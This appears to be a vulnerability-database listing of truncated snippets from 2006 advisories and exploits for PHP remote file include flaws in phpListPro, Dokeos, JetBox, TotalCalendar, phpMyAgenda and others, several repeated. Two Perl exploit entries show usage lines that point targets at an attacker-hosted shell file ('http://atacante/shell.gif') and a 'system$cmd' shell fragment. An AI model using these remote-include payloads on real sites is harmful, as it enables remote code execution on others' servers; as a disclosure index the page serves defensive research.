phpListPro <= 2.01 Multiple Remote File Include Vulnerabilities

No description provided by source. Title: phpListPro = 2.01 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: SmartISoft URL: http://smartisoft.com ----------------------------------------------------------------- Credits: Discovered by:...

Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit

Exploit for unknown platform in category web applications ============================================================== Dokeos LMS uso: perl own.pl perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.dokeos.com/ T...

phpListPro 2.01 - Multiple Remote File Inclusions

phpListPro 2.01 - Multiple Remote File Inclusions Title: phpListPro = 2.01 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: SmartISoft URL: http://smartisoft.com ----------------------------------------------------------------- Credits:...

Dokeos LMS &lt;= 1.6.4 (authldap.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl Dokeos Learning Management System 1.6.4 Remote File Include Exploit & Advisorie: beford xbefordx gmail com uso: perl own.pl host cmd-shell-url cmd-var perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: ? system$cm...

ActualAnalyzer Server <= 8.23 (rf) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ==================================================================== ActualAnalyzer Server = 8.23 rf Remote File Include Vulnerability ==================================================================== Title: ActualAnalyzer Server =8.23 ...

Jetbox CMS &lt;= 2.1 (relative_script_path) Remote File Inclusion Exploit

No description provided by source. !/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisorie: beford xbefordx gmail com uso: perl own.pl host cmd-shell-url cmd-var perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: ? system$cmd; ? cmd variable: cmd;...

TotalCalendar <= 2.30 (inc) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================= TotalCalendar = 2.30 inc Remote File Include Vulnerability ============================================================= Title: TotalCalendar =2.30 - Remote File Include...

TotalCalendar &lt;= 2.30 (inc) Remote File Include Vulnerability

No description provided by source. Title: TotalCalendar =2.30 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: SweetPHP URL: http://sweetphp.com ----------------------------------------------------------------- Credits: Discovered by:...

Fast Click SQL Lite 1.1.21.1.3 - show.php Remote File Inclusion

Fast Click SQL Lite 1.1.21.1.3 - show.php Remote File Inclusion source: https://www.securityfocus.com/bid/17819/info Fast Click SQL Lite is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can...

phpMyAgenda rootagenda Parameter File Include Vulnerability

phpMyAgenda is installed on the remote system. It's an open source event management system written in PHP. The application does not sanitize the 'rootagenda' parameter in some of its files. This may allow an attacker to include arbitrary files, possibly taken from third-party systems, and parse...

phpBB Advanced GuestBook addentry.php phpbb_root_path Parameter Remote File Inclusion

The remote host is running Advanced Guestbook, a free guestbook written in PHP. The version of Advanced Guestbook installed on the remote host fails to sanitize input to the 'phpbbrootpath' parameter of the 'admin/addentry.php' script before using it in a PHP 'include' function. Provided PHP's...

DMCounter092b.txt

Script: DMCounter Version: 0.9.2-b Language: PHP Problem: Remote File Include Vendor: http://sourceforge.net/projects/dmcounter Discovered by: beford Description ============= Statistics software based on PHP which does not require any database support but just uses flat files. Daily + monthly...

CVE-2006-2121

PHP remote file include vulnerability in admin/configsettings.tpl.php in I-RATER Platinum allows remote attackers to execute arbitrary code via a URL in the includepath parameter. NOTE: this is a different vector, and possibly a different vulnerability, than CVE-2006-1929...

CVE-2006-2121

PHP remote file include vulnerability in admin/configsettings.tpl.php in I-RATER Platinum allows remote attackers to execute arbitrary code via a URL in the includepath parameter. NOTE: this is a different vector, and possibly a different vulnerability, than CVE-2006-1929...

CVE-2006-2121

CVE-2006-2121 is a PHP remote file inclusion vulnerability affecting I-RATER Platinum, where an attacker can execute arbitrary code through a URL supplied in the include_path parameter in admin/config_settings.tpl.php. The NVD entry lists a MEDIUM base score (5.0) with network access and no authe...

DMCounter Remote File Include

Script: DMCounter Version: 0.9.2-b Language: PHP Problem: Remote File Include Vendor: http://sourceforge.net/projects/dmcounter Discovered by: beford xbefordx gmail com Description ============= Statistics software based on PHP which does not require any database support but just uses flat files...

phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Vulnerability

Exploit for unknown platform in category web applications ================================================================== phpMyAgenda = 3.0 Final rootagenda Remote Include Vulnerability ================================================================== Title: phpMyAgenda =3.0 Final - Remote Fi...

phpMyAgenda &lt;= 3.0 Final (rootagenda) Remote Include Vulnerability

No description provided by source. Title: phpMyAgenda =3.0 Final - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: phpMyAgenda URL: http://phpmyagenda.com ----------------------------------------------------------------- Credits:...

CoolMenus.txt

Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html ColMenus Event Remote File Include Vulnerability Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus Closed Script : CoolMenus v4.0 Event Script Risk : High Class : Remote Greetz :...

ArtmedicEvent.txt

Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-include.html Artmedic Event Remote File Include Vulnerability Website : http://www.artmedic.de/ Script : Artmedic Event Script Risk : High Class : Remote Greetz : B3g0k,Nistiman,Flot,Netqurd etc.. d0rk :...